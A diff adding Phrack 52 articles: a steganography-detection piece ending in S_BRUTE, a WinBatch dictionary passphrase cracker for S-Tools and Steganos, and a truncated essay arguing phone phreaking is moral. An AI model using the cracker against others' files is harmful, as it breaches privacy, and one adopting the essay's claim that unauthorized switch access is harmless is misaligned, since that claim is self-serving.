+255,255,255 which in binary equates to:
+
+11111111 11111111 11111111
+
+listed in RGB order.  By altering the LSB of each color in the RGB element,
+we can hide data by making almost identical copies of colors such that only
+the LSBs are different.  Since the color is only changed by one or two LSBs,
+the resulting colors are very close, perhaps undetectable to the human eye.
+The result of this change to the colors in the table enables nearly identical
+colors to be referenced by multiple table entries.  This becomes extremely
+obvious when the palette is viewed and sorted by luminance (relative
+brightness)in a product such as Paint Shop Pro.  These similar colors will be
+grouped right next to each other in a luminance-sorted palette.  Using this
+technique, a binary 1 in the message file can be represented in the stego file
+by replacing a color in the container file with an altered version of that
+color whose RG or B element ends with a binary 1.  Likewise, a binary 0 in the 
+message file can be represented in the stego file by replacing the original
+color in the container file with an altered version of that color whose RG or 
+B element ends with a binary 0.
+
+
+III. Steganographic Thumbprints 
+
+
+    Several tools are available that apply these techniques to files on
+several different platforms.  I will focus on two specific toolsets; Steganos
+and S-Tools v4.0.  Steganos is perhaps the most versatile and powerful of the
+toolsets, while S-Tools seems to be the easiest and most widely used (not to
+mention the fact that I like S-Tools; it's been around for a long time and
+is very well done).  Other available toolsets include similar functionality
+and hiding techniques.  In order to discover what the tools actually do when
+they hide data, it's best to use a simple BMP container file.  The RGB BMP
+file utilizes a palette scheme identical to that of a GIF for the purposes
+of our tests, and all the reviewed toolsets can use BMP files as containers.
+
+    For example, consider a container image which is 50 pixels by 50 pixels and
+contains only black-colored (0,0,0) pixels.  This image references palette
+entry 0 (zero) as its only color.  I will use a freeware painting program Paint
+Shop Pro V4.10 (PSP) to create and analyze the base images.  When creating 
+this image, PSP used a default palette with 216 unique palette entries and 40 
+"filler" entries at the end of the palette all of which contain the value 
+(0,0,0) or pure black.
+
+Our message file is simply a text file which contains the phrase "This is a
+test."
+
+
+A. S-Tools
+
+
+    When the message file is hidden using S-Tools, the resulting 8-bit image
+appears identical to the human eye when compared to the original.  However,
+there are perceptible oddities about the file which are revealed under closer 
+scrutiny.
+
+    Since S-Tools uses RGB element LSB modification as its hiding technique,
+the palette has distinct and very obvious characteristics.  Many of the
+palette's colors are offset by a single bit in the R,G or B element.  This is
+very obvious when the palette is sorted by luminance (brightness) and viewed
+with PSP.  The first sixteen (and only original) colors in this palette are:
+
+(51,1,1) (51,1,0) (50,1,0) (51,0,1) (51,0,0) (50,0,1) (50,0,0) 
+
+(1,1,0) (1,1,0) (0,1,1) (0,1,0) (1,0,1) (1,0,1) (1,0,0) (0,0,1) (0,0,0)
+
+    Notice that the offsets of the RGB elements are only 1 bit.  This is an
+imperceptible color change, and is a very wasteful use of the palette.
+Remember, there are only 256 colors to work with.  Most 8-bit image creation
+programs are very careful when deciding which colors to include in the palette,
+and almost all use standard palettes which contain all the most commonly used
+colors.  To see a palette with this many _nearly_ identical colors is odd.
+Also, the palette has been adjusted to contain less colors. The standard 
+colors selected by PSP have been replaced by some of the colors listed above.
+As is typical with this type of hiding, the slack space at the end of the
+palette has been reduced to make room for the new copies of existing colors.
+This type of hiding will always make itself obvious by using single-bit
+offsets in one or more of the LSBs.  Since this type of thumbprint is so
+easily identifiable, we will concentrate our efforts on the harder-to-detect
+palette reference method used by Steganos.
+
+
+B. Steganos
+
+
+    Steganos kindly reminds you that 8-bit images don't make terribly secure
+containers.  It's a good thing, too, because when the message file is hidden
+using Steganos the resulting 8-bit image has a major anomaly- the stego
+image is completely different than the original!  As opposed to an all-black
+image, the image now resembles a black-and-blue checkerboard.  However, this
+difference is only obvious if you have access to the original image.  Since
+an interceptor will most likely not have a copy of the original image, we
+will examine other methods of detection.  When the palette of the image is
+checked for single-bit offset colors (as in the stego image created with
+S-Tools), none can be found.  Also, there is no more or less slack space at
+the end of the palette than existed in the original palette.  Steganos does
+not alter the palette in any way when hiding data.  It uses the LSB palette
+reference technique described above.  However, there are very distinctive
+ways of determining if this technique has been used to hide data, specifically
+by looking at _how_ the palette's colors are used.  In this simple case, a
+histogram will show exactly the type of modification we are looking for.
+In the words of the PSP Help documentation,
+
+"A histogram is a graph of image color values, typically RGB values and/or
+luminance.  In a histogram, the spectrum for a color component appears on the
+horizontal axis, and the vertical axis indicates the portion of the image's
+color that matches each point on the component's spectrum."
+
+    In a nutshell, this simply means a graph is generated showing how the
+color(s) are used in an image, and how similar (in shade) they are.  When
+viewing the "blue" histogram for the Steganos-hidden file, we see something
+like this:
+
+100= X                   X
+   - X                   X
+90 = X                   X
+   - X                   X
+80 = X                   X
+   - X                   X
+70 = X                   X
+   - X                   X
+60 = X                   X
+   - X                   X
+50 = X                   X
+   - X                   X
+40 = X                   X
+   - X                   X
+30 = X                   X
+   - X                   X
+20 = X                   X
+   - X                   X
+10 = X                   X
+   - X                   X
+00 = X                   X 
+  . ! . ! . ! . ! . ! . ! . ! . ! . ! . ! . . . 
+    0   1   2   3   4   5   6   7   8   9       2
+    0   0   0   0   0   0   0   0   0   0       5     
+                                                5
+
+    The X-axis shows the spectrum for the color blue (from 0 to 255).  The
+Y-axis shows the number of pixels in the image that match that color.  When
+displaying a histogram, the 100 on the Y axis is not percentage, but a MAX
+value (in this case 1272) which indicates the greatest number of pixels used
+for _any_one_color_.  Since there are really only two colors _used_ in this
+stego image, there are only two vertical bars.  These bars indicate that in
+the Blue color family there are really only two colors used; one with a blue
+value of zero, and another with a blue value of approximately 50 (51 to be
+exact).  Upon examining the color table for this image sorted in
+_palette_order_, it is evident that these two referenced colors are only
+similar since they are placed right next to one another in the palette.  The
+two colors are (0,0,0) and (0,0,51) or black and very, very dark blue.  The
+image mostly has black hues, and Steganos probably picked the very dark blue
+color (00110011) as the 1 for some hidden data, and black (00000000) as the
+0 for some hidden data since these colors are _right_ next to each other in
+a palette-index-order color table listing.  Although they reside next to each
+other in the palette, the colors are not very similar which makes the final
+stego file appear discolored.  Steganos does not modify any of the colors,
+but it modifies how the original palette is used by making nearly equal
+references to a color and its neighbor (when sorted by palette index).
+Bottom line: this image uses neighboring palette colors nearly an identical
+number of times.  1272 pixels were used for black and 1228 pixels were used
+for the dark, dark blue.  This would not be unusual if not for the fact that
+the colors are palette index neighbors.  If the designer of the image were
+using some sort of shading effect, there would be many more than just two
+shades involved in this 256 color image, and the shading offsets would be
+greater.  These two colors don't even appear as shades of one another when
+placed side-by-side.
+
+    A skilled interceptor will know immediately that something is not quite
+right with these images.  They both display typical signs of data hiding.
+
+
+IV.  Real-World example
+
+
+    Intercepting a single-color image and determining that it is stegoed is a
+trivial task.  Increasing the number of used colors within the boundaries of
+the 256-color palette could (so the reader may think) obfuscate the hidden
+message file.  However, by applying a few simple methodologies, a pattern
+emerges which can increase the odds of detecting a stegoed image.  For
+example, if a two-color image is created using only the colors black (0,0,0)
+and white (255,255,255), and data is hidden in the file by using Steganos,
+the results would show that Steganos not only used black and white, but two
+more colors from the palette are used with values of (0,0,51) and
+(255,255,51) respectively.  These newly-used colors adjoin the original two
+colors in the palette listing, have differing LSBs, and are referenced
+nearly as much in the new image as the original colors are.  A similar
+situation evolves when a 6-color image is created.  After Steganos hides the
+data, the original 6 colors and their palette neighbors will be used in
+the new file.  The 6 new colors become alternate representations of the
+original 6 colors in terms of their LSBs.  This methodology holds true all
+the way up to images containing 256 different colors.  By understanding these
+patterns, all 8-bit Steganos images can be detected without access to the
+original image.
+
+    When attempting to detect the use of steganography in 16 or 24-bit images,
+a great deal of pattern analysis must be used.  24-bit stego detection is not
+for the faint of heart, but it can be done.  Standard "randomization" solutions
+fall quite short of solving this problem since LSB data in image creation
+programs is hardly random.  It follows a pronounced pattern when viewed as a
+part of a whole: an 8-bit number.  Most standard graphics effects do not use
+random data, they use patterns to create and maintain a certain graphic
+illusion.  Inserting "random" data, even at the LSB level can become fuel for
+the analyst's fire.  In many 24-bit stego programs, bits in the secret text
+are generally inserted with average spacing between them, then random "noise"
+is added to make the secret bits seem less obvious.  The random "noise" would 
+(should!) have a random interval between differing bits.  The contrast of an
+average spacing against random spacing may be enough to not only alert an
+analyst, but to point out where secret bits start and random bits begin.  The
+bottom line is that 24-bit detection is doable, just not practical for an
+amateur- yet!
+
+
+V.  The Future
+
+
+    Steganography is in it's infancy, but several new technologies are emerging
+including selection and construction methods of data hiding and continuing
+research in the area of random distribution.
+
+    Selection involves the generation of a large number of copies of the same
+container file that differ slightly.  In the case of an image file, you may
+make minor adjustments in hue, saturation and RGB levels to the end that your
+secret message will eventually _appear_ in the LSBs of the data!  Although
+difficult to generate, this type of data hiding is nearly impossible to detect
+since the image's characteristics are not altered at all.
+
+    Construction simply involves modeling the characteristics of the original
+container when creating your message.  In simplest terms, mold your message
+around the existing container instead of molding the container to your message.
+If, for example the original image were left unchanged, and a key was
+developed to create the message _from_ the image, detection would be impossible
+without the key.
+
+    Several advances are being made in the area of random distribution,
+specifically by Tuomas Aura at the Helsinki University of Technology.  His
+paper "Practical Invisibility in Digital Communication" presents a technique
+called "pseudorandom permutation", which brings steganography up to the
+technical level of cryptography and properly addresses the issue of
+randomness from a data hiding perspective.  His paper is excellent reading
+and can be found at http://deadlock.hut.fi/ste/ste_html.html
+
+    Interesting research (and proof-of-concepts) are being done to utilize
+stego techniques in reserved fields in TCP, UDP and ICMP packets.  This
+research proves that steganography has merit and application beyond sound and
+image files.  Unfortunately, using stego where there was nothing before (ie 
+within typically blank reserved fields) can raise a flag in and of itself.  Use
+encryption and compression to further protect data.  It really doesn't matter
+if the secret data is discovered if the underlying crypto is secure.
+
+
+VI. Conclusion
+
+
+    Detecting stego in an 8-bit image is fairly easy.  Actually gaining access
+to the secret text becomes a bit harder yet a simple overlooked method involves
+bruteforcing the creating application (see S_BRUTE.WBT program below).  On the
+other hand, 24-bit image analysis requires quite a bit of work.  If you choose
+to employ data hiding techniques, use 24-bit images and compress and encrypt
+your message file, bearing in mind that 24-bit images can raise flags simply
+due to their size.
+ 
+When attempting to identify stego files in 8-bit images, keep in mind the
+following pointers: 
+
+* Search for the obvious thumbprint of an RGB element.
+* In the stego file: single-bit offsets between colors in a palette sorted by 
+  luminance (this SCREAMS S-Tools!).
+* If no single-bit offsets exist between the colors in the palette, search
+  for Palette Reference thumbprints which include the following:
+* Use of palette index neighbors a near-equal number of times either in the
+  entire image (use a histogram) or in an area which should be primarily
+  single-color only but contains a checkerboard effect (use zoom 11:1 to see
+  individual pixels, and the eyedropper tool to quickly view the RGB
+  elements in PSP)
+* Poor image quality (noise and snow are common side-effects).
+* For more detailed analysis the reader might consider using an MS-DOS 
+  program msgifscn.zip, available from Simtel mirror sites worldwide, to
+  dump the entire contents of an 8-bit GIF image's palette to a file, which
+  can be dumped into MS Excel for analysis (the analysis add-in in for Excel
+  comes in REAL handy for binary conversions and data sorts.)
+* If you have a clue that the file you're looking at may contain stegoed 
+  data, it never hurts to brute force the application that created it! (see
+  the S_BRUTE program listing at the end of this article) While this may be
+  one of the slower methods of breaking stego, it is often easier to
+  derive possible keyphrases from other sources than attacking the stego
+  algorithm or the crypto.
+
+
+VII.  The program
+
+    The author of S-Tools sells the source code for his program, and Steganos
+makes available an SDK for hiding/decoding files using it's algorithms, but
+an option exists for programs that do not make their source available:
+bruteforce of the application itself.  Although using the API and SDK's
+available would be significantly faster, there are times when this option
+just may not exist.
+
+    To that end, included below are two files, S_BRUTE.WBT and S_BRUTE.INI.
+This program was written in WinBatch, which is a language that acts very much
+like the UNIX language TCL/TK (or Expect), but operates in a Windows 95/NT
+context.  Developed to control Windows applications, WinBatch provides a
+perfect vehicle for brute-forcing an application's password function (see
+http://www.windowware.com for the free compiler to run S_BRUTE). S_BRUTE is
+an application that will bruteforce S-Tools v4 and Steganos using a
+dictionary file in an attempt to determine the passphrase of a stegoed image
+(which will subsequently reveal the hidden text). The program selects which
+tool to use based on which executable you select, and the S-Tools portion of
+the program will not only bruteforce the passphrase, but will attempt all
+four algorithms available to S- Tools.  Unfortunately S-Tools uses certain
+mouse-only operations, so you will effectively lose your mouse while the
+S-Tools portion runs.  The dictionary needed by this program is simply a list
+of words or passphrases separated by newlines.  Keep in mind that Steganos
+does not allow passwords shorter than five characters, so strip those out to
+save time.  If you need to use a " (double-quote) in the word/passphrase,
+simply use "" (two double quotes) in the dictionary.  WinBatch likes this.  A
+log file is created as c:\output.txt which simply lists all the attempted
+words/passphrases.  The output file can be reused as a dictionary since no
+extraneous information is written out.  Two options exist for inputting the
+names of the Stego tool executable, the dictionary file and the stego image.
+The S_BRUTE.INI file format (see below) allows the variables exepath, dict
+and stegofile which allow the input of these full path names into the
+program.  In addition, the program can prompt for the filenames manually
+using standard Windows '95 file boxes.  In this case, pay attention to the
+box titles as they come up.  These titles describe what file the program is
+looking for.  A variable is also available in the INI file called
+STEGANOSDELAY.  This value (listed in seconds) determines how long to wait
+for a passphrase error message from Steganos.  The default is 0, but if you
+get a lot of false positives (your machine is SLOW!) set this value to a few
+seconds.  Due to the speed of the bruteforce attack, this program is not
+always accurate as to _which_word_ actually worked if it finds a match.  In
+this case, S_BRUTE will tell you which word it _thinks_ worked, but you may
+have to try the word S_BRUTE gave you plus one or two of the previous words
+in c:\output.txt (plus a few different algorithms if you're using S-Tools).
+Either way, you are only looking at about 12 combinations (not bad!).
+
+    Note that S-Tools and/or Steganos must be properly installed prior to using
+this program.  S_BRUTE was not designed to brute force the entire keyspace, but
+to give you a faster method of determining the passphrase if you have any idea
+what it might be.  If the stego image is found on a web page, create a
+dictionary from words and phrases found on that site, and let S_BRUTE do the
+work for you.
+
+<++> sbrute/S_BRUTE.WBT
+;; Steganography Brute v1.0 written by a researcher at hacklab.com 
+;; For new versions and support programs see http://www.hacklab.com
+;; This little toy brute forces two very common Steganography utilities, 
+;; specifically Steganos (http://www.steganography.com) and S-Tools written 
+;; by Andrew Brown (a.brown@nexor.co.uk) 
+;; This program can be run using a free program called WinBatch 
+;; from http://www.windowware.com
+;;
+;;
+;;Notes:
+;;
+;; 1) The program depends on the executable name being either "S-TOOLS.EXE" or
+;;	"STEGANOS.EXE". This exe name decides many things, including the
+;;	semantics of the brute force attack and which types of container files
+;;	to accept. (Remember that the tools accept different types of container 
+;;	files.)
+;; 2) The dictionary file is simply a text file with words or phrases separated
+;; 	by CR(LF). If a " (double quote) must be used in the word or phrase, 
+;;	use "" (two double quotes) instead. This is Winbatch's way of representing
+;; 	the double quote in a string.
+;; 3) Internally, this program converts all Windows LFN-formatted dir/filenames to
+;;	DOS-style 8.3 or short dir/filenames. If you have problems, finding/using
+;;	LFN files, you may want to manually convert them to a SFN dir/file structure.
+;; 4) The S-Tools test requires certain mouse-only operations. During this part of
+;;	the program, it's best to leave your machine alone. Otherwise the mouse will
+;;	be all over the place. Sorry. 
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+:main                         ;;
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+
+
+Intcontrol(12,4,0,0,0) 		;;controls abrupt endings
+
+if (winmetrics(-4) < 4 ) 
+        error="This program runs on Windows NT or Windows '95 only!"
+        gosub bail_error
+EndIf
+
+cr=Num2Char(13)
+lf=Num2Char(10)
+crlf=StrCat(cr, lf)
+progname="Steganography Brute"
+STEGANOS=0			;; Flag for Steganos
+STOOLS=0			;; Flag for S-Tools
+	
+
+
+text1='This program brute forces Steganography programs.'
+text2='Including S-Tools v4.0 and Steganos. Do you wish'
+text3='to continue?'
+;q = AskYesNo('%progname%',"%text1% %crlf% %text2% %crlf% %text3%")
+If (AskYesNo('%progname%',"%text1% %crlf% %text2% %crlf% %text3%")  == @NO) Then Exit
+
+text1="It is easiest to make all file settings through the"
+text2="S_BRUTE.INI file in this directory. If you do not use"
+text3="this file, you will be manually prompted for the files."
+Text4="Do you wish to use the INI file?"
+q= AskYesNo("%progname%"," %text1% %crlf% %text2% %crlf% %text3% %crlf% %text4%")
+
+if (q  == @NO) Then gosub prompt_for_files
+else gosub set_files
+
+
+if (STEGANOS) 
+	gosub steganos
+else 
+	if (STOOLS) then gosub stools
+EndIf
+
+error="Passphrase not found!"
+gosub bail_error
+
+Exit
+
+
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+:steganos                 ;;;
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+Run("%exepath%", "%stegofile%")
+WinWaitExist("",10)        ;;; Steganos' first window has no title. 
+			   ;;; If you have problems,
+SendKeysTo("","{ENTER}")   ;;; comment out these two lines...
+;TimeDelay(10)             ;;; and uncomment...
+;SendKey("{ENTER}")        ;;; these two lines.
+
+
+WinWaitExist("Steganos for Windows 95",30)
+SendKeysTo("Steganos for Windows 95","{ENTER}")
+
+dictgrip=FileOpen("%dict%","READ")
+fn1="c:\output.txt"
+handleout=FileOpen("%fn1%","Append")
+stitle="Steganos for Windows 95"
+START_TIME=TimeYmdHms()
+word=0
+
+while (word != "*EOF*")            
+   word = FileRead(dictgrip)
+   if word =="" then continue
+   if word =="*EOF*" then break
+   ClipPut("%word%")
+   SendKeysTo(stitle,"^v{ENTER}")
+   TimeDelay(STEGANOSDELAY)
+   test=strsub(MsgTextGet(stitle),1,22)
+   if test=="" 
+    text1="I think we have a match!"
+    text2="Due to the speed of the brute force attack, check c:\output.txt"
+    text3="to see the last few words used, but I think the passphrase is:"
+    text4="%word%"
+    success="%text1% %crlf%%text2% %crlf%%text3% %crlf%%text4%"
+    gosub bail_success
+   else
+    if test=="This password is wrong"
+	   SendKeysTo(stitle,"{ENTER}")
+	   SendKeysTo(stitle,"!B{ENTER}")
+	   FileWrite(handleout,"%word%" )
+    endif
+   endif
+endwhile
+STOP_TIME=TimeYmdHms()
+
+FileClose(dictgrip)
+FileClose(handleout)
+
+Return
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+:stools                  ;;;
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+Run("%exepath%", "%stegofile%")
+if (WinWaitExist("Welcome to S-Tools",5) == @TRUE) 
+	SendKeysTo("Welcome to S-Tools","!C")
+EndIf
+
+	winplace(0,0,400,400,"~S-Tools")
+	WinWaitClose("Please Wait")
+	SendMenusTo("~S-Tools", "Window Tile Horizontally")
+
+text1="S-Tools requires certain mouse-only operations."
+text2='After clicking OK, position the mouse within your'
+text3="image in the S-Tools window and click the left button."
+
+message("Setup mouse for S-Tools","%text1% %crlf% %text2% %crlf% %text3%")
+
+while (mouseinfo(4)!="4")
+	magic=mouseinfo(2)
+endwhile
+
+magicx=( ItemExtract(1,magic," ") )
+magicy=( ItemExtract(2,magic," ") )
+
+
+dictgrip=FileOpen("%dict%","READ")
+fn1="c:\output.txt"
+handleout=FileOpen("%fn1%","Append")
+
+START_TIME=TimeYmdHms()
+word=0
+while (word != "*EOF*")            
+        word = FileRead(dictgrip)
+        if word =="" then continue
+	ClipPut("%word%")
+
+	;;;  write to the output file
+	if word!="*EOF*" 
+		if (FileWrite(handleout,"%word%" ) >0)
+			error="Unable to open file %fn1%."
+			gosub bail_error
+		EndIf
+	Endif
+		
+	for dumnum=1 to 4      ;; for all the algorithms 
+		
+	 MouseMove(magicx, magicy, "","")
+	 MouseClick(@RCLICK, 0)
+	 SendKeysTo("~S-Tools","r")
+	 SendKeysTo("~Revealing","!P^v!V^v!E")
+
+	 if (dumnum==1) then SendKeysTo("~Revealing","I")   ;; IDEA
+	 if (dumnum==2) then SendKeysTo("~Revealing","D")   ;; DES
+	 if (dumnum==3) then SendKeysTo("~Revealing","T")   ;; DES3
+	 if (dumnum==4) then SendKeysTo("~Revealing","M")   ;; MDC
+	 SendKeysTo("~Revealing","{ENTER}")
+	 ;childlist=WinItemChild("~S-Tools")
+	 numchilds= ItemCount(WinItemChild("~S-Tools"), @TAB)
+
+	 if (numchilds>2)
+	  text1="We have an extra window in S-Tools! Possible passphrase match."
+	  text2="Due to the speed of the brute force attack, check c:\output.txt"
+	  text3="to see the last few words used, but I think the passphrase is:"
+	  text4="%word%"
+ 	  success="%text1% %crlf%%text2% %crlf%%text3% %crlf%%text4%"
+	  gosub bail_success
+	 endif
+       next
+
+endwhile
+
+FileClose(dictgrip)
+FileClose(handleout)        
+
+return
+
+
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+:set_files                    ;;
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+fname=IniReadPvt("Main", "exepath", ".\S-TOOLS.EXE", ".\S_BRUTE.INI")
+gosub path_clean
+exepath=fname
+
+gosub determine_tool_type
+
+fname=IniReadPvt("Main", "dict", ".\DICT.TXT", ".\S_BRUTE.INI")
+gosub path_clean
+dict=fname
+
+fname=IniReadPvt("Main", "stegofile", ".\STEGO.GIF", ".\S_BRUTE.INI")
+gosub path_clean
+stegofile=fname
+
+STEGANOSDELAY=IniReadPvt("Main","STEGANOSDELAY","0",".\S_BRUTE.INI")
+
+gifname= ItemExtract( (ItemCount("%stegofile%", "\")), "%stegofile%", "\")
+
+Return
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+:prompt_for_files             ;;
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+msg = "Enter the Steganos error delay 0-60"
+STEGANOSDELAY=AskLine("%progname%", msg ,"0")
+
+types="Dictionary Text Files|*.txt|All Files|*.*|"
+dict=AskFileName("Select Dictionary Filename", "C:\", types, "dict.txt", 1)
+dict=FileNameShort(dict)
+
+types="Steganography tool Executable|*.exe|"
+msg="Where is the S-Tools or Steganos executable?"
+exepath=AskFileName(msg, "C:\", types, "", 1)
+exepath=FileNameShort(exepath)
+
+gosub determine_tool_type
+
+if (STEGANOS)
+  types="Stego File (with hidden message)|*.bmp;*.dib;*.voc;*.wav;*.txt;*.html|"
+else
+  types="Stego File (with hidden message)|*.gif;*.bmp;*.wav|"
+endif
+
+text1="Select Stego Filename (containing hidden message)"
+stegofile=AskFileName("%text1%", "C:\", types, "", 1)
+stegofile=FileNameShort(stegofile)
+gifname= ItemExtract( (ItemCount("%stegofile%", "\")), "%stegofile%", "\")
+Return
+
+
+
+
+
+
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+:path_clean                   ;;
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+switch FileExist(fname)
+	case 0	
+		error="File %fname% not found!"
+		gosub bail_error
+		break
+	case (2)
+		error="File %fname% in use!"
+		gosub bail_error
+		break
+endswitch
+fname=FileNameShort(fname)
+Return
+
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+:determine_tool_type          ;;
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+exename=(StrUpper(ItemExtract( (ItemCount("%exepath%", "\")), "%exepath%", "\")))
+
+if (exename == "S-TOOLS.EXE") then STOOLS=1
+else if (exename == "STEGANOS.EXE") then STEGANOS=1
+Return
+
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+:bail_error                   ;;
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+STOP_TIME=TimeYmdHms()
+Message("%progname% Error!","%error%")
+SECONDS=TimeDiffSecs(STOP_TIME,START_TIME)
+Message("%progname%","Finished in %SECONDS% seconds.")
+Exit
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+:bail_success                 ;;
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+STOP_TIME=TimeYmdHms()
+Message("%progname% Success!!!","%success%")
+Message("%progname%","Time Started: %START_TIME%%crlf%Time Finished: %STOP_TIME%")
+Exit
+
+<-->
+<++> sbrute/S_BRUTE.INI
+[Main]
+
+EXEPATH="C:\Program Files\Deus Ex Machina\Steganos\Steganos.exe"
+DICT="C:\win\desktop\dict.txt"
+STEGOFILE="C:\win\desktop\steclouds.bmp"
+;STEGOFILE="C:\win\desktop\s-tclouds.gif"
+STEGANOSDELAY=0	;; Set this higher for false positives.
+			;; (Steganos does not use different names for its
+			;; windows, so this program makes negative result
+			;; checks (ie bad passwords) based on an error dialog.
+			;; This timeout controls how many seconds to wait for 
+			;; an error. Default=0
+
+<-->
+----[  EOF
+
diff --git a/phrack52/9.txt b/phrack52/9.txt
new file mode 100644
index 0000000..d345890
--- /dev/null
+++ b/phrack52/9.txt
@@ -0,0 +1,284 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 09 of 20
+
+
+-------------------------[  On the Morality of Phreaking
+
+
+--------[  Phrack Staff
+
+
+
+             The issue of phone phreaking is an interesting topic for 
+        discussion concerning morality.  For those not familiar with this 
+        topic, I will give a brief outline of the subject.  Following the 
+        outline of phreaking, I will analyze the issue of whether 
+        phreaking as defined in the outline is a morally right act, from 
+        the perspective of John Stuart Mill and Immanuel Kant.  Finally, 
+        I will address the fallacies of each of the arguments they might 
+        present concerning the topic and provide a determination of which 
+        stands as the superior argument for this subject.
+
+             The meaning of phone phreaking has changed over the years; 
+        its initial growth can be traced in a large part to a magazine 
+        named TAP (Technical Assistance Program) started by Abbie Hoffman 
+        in 1971 as part of his Youth International Party (YIPL) (Meinel, 
+        5).  The intent at this point in time was to utilize technology 
+        in order to subvert government and big business institutions.  As 
+        time progressed, phreaking became less politically motivated and 
+        instead was led more by technology enthusiasts interested in 
+        learning about the phone systems and how they worked.  In 1984, 
+        2600 magazine was formed by Eric Corley in order to further this 
+        spread of knowledge (Corley).
+
+             The definition of phone phreaking I will use for the 
+        purposes of this paper is that which the prominent members of the 
+        hacking/phreaking "scene" would use.  In discussing the 
+        motivations of a phone phreaker, I speak from both personal 
+        experience and from numerous conversations with individual 
+        phreakers over a period of years.  Phreaking is the pursuit of 
+        knowledge concerning how phone systems operate.  The skills that 
+        a phreaker learns in this pursuit of knowledge has the effect 
+        that they can often gain control of a phone switch in order to 
+        make add additional phone lines, modify billing information, and 
+        other such activities, but these are generally considered 
+        unrelated to that which an actual phreaker is interested in, and 
+        I will focus only on the activities of those true phreakers that 
+        are motivated by the desire for knowledge and not for other 
+        gains.  Generally however, phreaking does involve utilizing the 
+        resources of a phone company switch without the permission of the 
+        company owning it, in order to both explore its capabilities and 
+        to communicate with other phreakers in order to share knowledge.
+
+             John Mill, given his views of morality as found in 
+        Utilitarianism, would find that phone phreaking is a morally 
+        right act.  In order to find that an act is morally right, it 
+        should have a net benefit in terms of the happiness it adds to 
+        the world versus the opposite of happiness it causes (Mill, 7).  
+        To show that phreaking is morally right, first it must be shown 
+        that it does have a positive effect on the general happiness in 
+        the world, and then proceed to show that any negative effects 
+        that phreaking may have are sufficiently minor so as to be 
+        outweighed by the positive effects.  If the positive effects are 
+        greater than the negative effects, then clearly the act is 
+        morally right.
+
+             First, the actual benefit that phreaking has for the 
+        individuals involved in it is not directly the pursuit of 
+        happiness, but rather the pursuit of knowledge.  Since morality 
+        is determined by happiness, not knowledge, how knowledge relates 
+        to happiness needs to be resolved.  The reason this pursuit still 
+        relates to morality is that individuals that are pursuing 
+        knowledge for no motivation other than itself are doing so 
+        because the gain of knowledge has become a part of those 
+        individuals' happiness.  It is in the same way that Mill argues 
+        the pursuit of virtue can be reconciled with the pursuit of 
+        happiness that knowledge can also be reconciled (Mill, 35-37).  
+
+             Phreaking does have a benefit to the individuals that are 
+        involved in its practice.  This benefit is in the form of a gain 
+        of knowledge concerning the phone systems.  This knowledge is 
+        gained in generally one of two ways, both of which are common 
+        methods of learning and the reader will recognize.  The first is 
+        through experimentation and exploration.  By accessing the phone 
+        switch, phreakers are able to experiment with its capabilities 
+        and teach themselves how to operate it.  In the second case, the 
+        phone switches that phreakers have learned to use are utilized as 
+        a method of communication with other phreakers.  The free 
+        communication that comes about as a result of the phone system 
+        knowledge that has been gained allows phreakers to exchange new 
+        information and teach each other, either as peers or through a 
+        teacher-pupil relationship, even more about the phone system.  In 
+        both cases, knowledge is gained, and as knowledge is a part of a 
+        phreaker's happiness, the general happiness of the world is 
+        increased.
+
+             Any negative impact phreaking has is minimal, and indirect.  
+        The resources that are being used are possessed by phone 
+        companies, corporations.  A corporation of itself is not a moral 
+        being, but a corporation has an effect on three different types 
+        of people: stock holders, employees, and consumers.  
+
+             A stock holder's interest in a corporation is purely on the 
+        profits that it produces.  Stockholders could be negatively 
+        effected by phreakers if a phreaker causes a loss of revenue, or 
+        an increase in costs.  A loss in revenue for a phone company can 
+        only occur if the phreaker uses some resource that if not in use 
+        would otherwise be used by a paying customer, or if the phreaker 
+        herself would have paid for the resource utilization if it had 
+        not been attainable for free.  In the first case, phone systems 
+        use a technique called multiplexing to handle simultaneous phone 
+        calls between switches.  If a phone system is below capacity, 
+        there are empty time slices or frequencies (depending on type of 
+        trunk) in the data that is transmitted between switches.  Adding 
+        a new connection between switches involves only filling one of 
+        these idle slots, with no degradation of quality for existing 
+        phone calls, and no marginal cost associated with the additional 
+        call.  It is only in the case where a phone system is filled to 
+        capacity that a phreaker using a slot would prevent an existing 
+        customer from using the phone system, resulting in a loss of 
+        revenue.  In fact, phreakers being more cognizant of this fact 
+        that the general public will purposely explore the phone system 
+        when it is at its lowest capacity times (late at night and on 
+        weekends) just to avoid this situation.  
+
+             The second part of the stock holders interests is that a 
+        phreaker would potentially pay for the phone calls she is making 
+        for free.  An attraction of phreaking is that it does not cost 
+        money to involve ones self in, and most phreakers first start in 
+        their youth when they do not have access to being able to pay for 
+        phone calls to other phreakers, or even more to the point there 
+        is no price they could pay to gain access to a switch.  If the 
+        phone company were to make this available at a price to 
+        phreakers, almost universally they would not be able to afford 
+        the price, and would have to stop their gains in knowledge in 
+        that subject.  This would not result in any additional revenue 
+        for the phone company, only a loss of knowledge that the phreaker 
+        could have otherwise gained.
+
+             Employees are only impacted if they are either aware of 
+        something occurring, or have to perform some activity as a result 
+        of a phreaker's activities.  However, a phreaker only interacts 
+        with the phone company's equipment in an under utilized state, 
+        and not with employees.  Further, phreakers do not cause damage 
+        or interfere with the operation of the phone company's equipment, 
+        and so require no employee intervention.  In this manner, no 
+        employees are affected by phreakers.
+
+             Finally, consumers are also not negatively impacted by 
